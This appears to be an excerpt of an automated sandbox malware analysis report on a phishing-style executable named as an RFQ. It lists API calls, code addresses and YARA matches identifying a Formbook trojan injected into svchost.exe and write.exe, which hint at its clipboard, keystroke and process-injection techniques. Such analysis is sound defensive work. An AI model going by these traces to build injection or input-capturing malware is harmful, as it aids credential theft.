            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: RFQ - HTS45785-24-0907I000.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C3B3 NtClose,1_2_0042C3B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972B60 NtClose,LdrInitializeThunk,1_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk,1_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03974340 NtSetContextThread,1_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03974650 NtSuspendThread,1_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972B80 NtQueryInformationFile,1_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972BA0 NtEnumerateValueKey,1_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972BF0 NtAllocateVirtualMemory,1_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972BE0 NtQueryValueKey,1_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972AB0 NtWaitForSingleObject,1_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972AD0 NtReadFile,1_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972AF0 NtWriteFile,1_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972F90 NtProtectVirtualMemory,1_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972FB0 NtResumeThread,1_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972FA0 NtQuerySection,1_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972FE0 NtCreateFile,1_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972F30 NtCreateSection,1_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972F60 NtCreateProcessEx,1_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972E80 NtReadVirtualMemory,1_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972EA0 NtAdjustPrivilegesToken,1_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972EE0 NtQueueApcThread,1_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972E30 NtWriteVirtualMemory,1_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972DB0 NtEnumerateKey,1_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972DD0 NtDelayExecution,1_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972D10 NtMapViewOfSection,1_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972D00 NtSetInformationFile,1_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972D30 NtUnmapViewOfSection,1_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972CA0 NtQueryInformationToken,1_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972CC0 NtQueryVirtualMemory,1_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972CF0 NtOpenProcess,1_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972C00 NtQueryInformationProcess,1_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972C60 NtCreateKey,1_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03973090 NtSetValueKey,1_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03973010 NtOpenDirectoryObject,1_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039739B0 NtGetContextThread,1_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03973D10 NtOpenProcessToken,1_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03973D70 NtOpenThread,1_2_03973D70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B4650 NtSuspendThread,LdrInitializeThunk,6_2_047B4650
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B4340 NtSetContextThread,LdrInitializeThunk,6_2_047B4340
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_047B2C70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2C60 NtCreateKey,LdrInitializeThunk,6_2_047B2C60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_047B2CA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_047B2D30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_047B2D10
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_047B2DF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2DD0 NtDelayExecution,LdrInitializeThunk,6_2_047B2DD0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_047B2EE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_047B2E80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2F30 NtCreateSection,LdrInitializeThunk,6_2_047B2F30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2FE0 NtCreateFile,LdrInitializeThunk,6_2_047B2FE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2FB0 NtResumeThread,LdrInitializeThunk,6_2_047B2FB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2AF0 NtWriteFile,LdrInitializeThunk,6_2_047B2AF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2AD0 NtReadFile,LdrInitializeThunk,6_2_047B2AD0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2B60 NtClose,LdrInitializeThunk,6_2_047B2B60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_047B2BF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_047B2BE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_047B2BA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B35C0 NtCreateMutant,LdrInitializeThunk,6_2_047B35C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B39B0 NtGetContextThread,LdrInitializeThunk,6_2_047B39B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2C00 NtQueryInformationProcess,6_2_047B2C00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2CF0 NtOpenProcess,6_2_047B2CF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2CC0 NtQueryVirtualMemory,6_2_047B2CC0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2D00 NtSetInformationFile,6_2_047B2D00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2DB0 NtEnumerateKey,6_2_047B2DB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2E30 NtWriteVirtualMemory,6_2_047B2E30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2EA0 NtAdjustPrivilegesToken,6_2_047B2EA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2F60 NtCreateProcessEx,6_2_047B2F60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2FA0 NtQuerySection,6_2_047B2FA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2F90 NtProtectVirtualMemory,6_2_047B2F90
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2AB0 NtWaitForSingleObject,6_2_047B2AB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B2B80 NtQueryInformationFile,6_2_047B2B80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B3010 NtOpenDirectoryObject,6_2_047B3010
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B3090 NtSetValueKey,6_2_047B3090
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B3D70 NtOpenThread,6_2_047B3D70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047B3D10 NtOpenProcessToken,6_2_047B3D10
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_00878DB0 NtCreateFile,6_2_00878DB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_00878F20 NtReadFile,6_2_00878F20
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_008790B0 NtClose,6_2_008790B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_00879010 NtDeleteFile,6_2_00879010
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_00879210 NtAllocateVirtualMemory,6_2_00879210
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004096A0 0_2_004096A0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0042200C 0_2_0042200C
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0041A217 0_2_0041A217
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00412216 0_2_00412216
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0042435D 0_2_0042435D
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004033C0 0_2_004033C0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0044F430 0_2_0044F430
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004125E8 0_2_004125E8
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0044663B 0_2_0044663B
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00413801 0_2_00413801
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0042096F 0_2_0042096F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004129D0 0_2_004129D0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004119E3 0_2_004119E3
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0041C9AE 0_2_0041C9AE
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0047EA6F 0_2_0047EA6F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0040FA10 0_2_0040FA10
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0044EB59 0_2_0044EB59
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00423C81 0_2_00423C81
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00411E78 0_2_00411E78
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00442E0C 0_2_00442E0C
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00420EC0 0_2_00420EC0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0044CF17 0_2_0044CF17
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00444FD2 0_2_00444FD2
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_040B4EF0 0_2_040B4EF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004183F3 1_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403090 1_2_00403090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042E9B3 1_2_0042E9B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402BCE 1_2_00402BCE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402BD0 1_2_00402BD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FCC3 1_2_0040FCC3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FCBA 1_2_0040FCBA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004165DE 1_2_004165DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004165E3 1_2_004165E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FEE3 1_2_0040FEE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DF63 1_2_0040DF63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A003E6 1_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0394E3F0 1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FA352 1_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C02C0 1_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E0274 1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A001AA 1_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F41A2 1_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F81CC 1_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DA118 1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930100 1_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C8158 1_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D2000 1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393C7C0 1_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03964750 1_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940770 1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395C6E0 1_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A005911_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039405351_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE4F61_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E44201_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F24461_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F6BD71_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB401_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA801_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0A9A61_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A01_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039569621_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039268B81_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E8F01_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A8401_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428401_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEFA01_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC81_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960F301_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E2F301_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03982F281_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F401_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952E901_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FCE931_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEEDB1_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AE0D1_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEE261_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940E591_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958DBF1_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DCD1F1_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AD001_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0CB51_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930CF21_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940C001_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398739A1_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F132D1_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D34C1_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039452A01_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B2C01_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D2F01_2_0395D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E12ED1_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B1B01_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0B16B1_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1721_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397516C1_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EF0CC1_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039470C01_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70E91_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF0E01_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF7B01_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F16CC1_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039856301_2_03985630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD5B01_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A095C31_2_03A095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75711_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF43F1_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039314601_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FB801_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B5BF01_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DBF91_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB761_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DDAAC1_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03985AA01_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1AA31_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDAC61_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA491_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7A461_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B3A6C1_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D59101_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039499501_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B9501_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438E01_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD8001_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941F921_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFFB11_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD21_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD51_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF091_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949EB01_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FDC01_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D5A1_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943D401_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D731_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFCF21_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B9C321_2_039B9C32
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BEF1375_2_03BEF137
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03C0FBD75_2_03C0FBD7
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF11075_2_03BF1107
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF78075_2_03BF7807
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF78025_2_03BF7802
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF0EE75_2_03BF0EE7
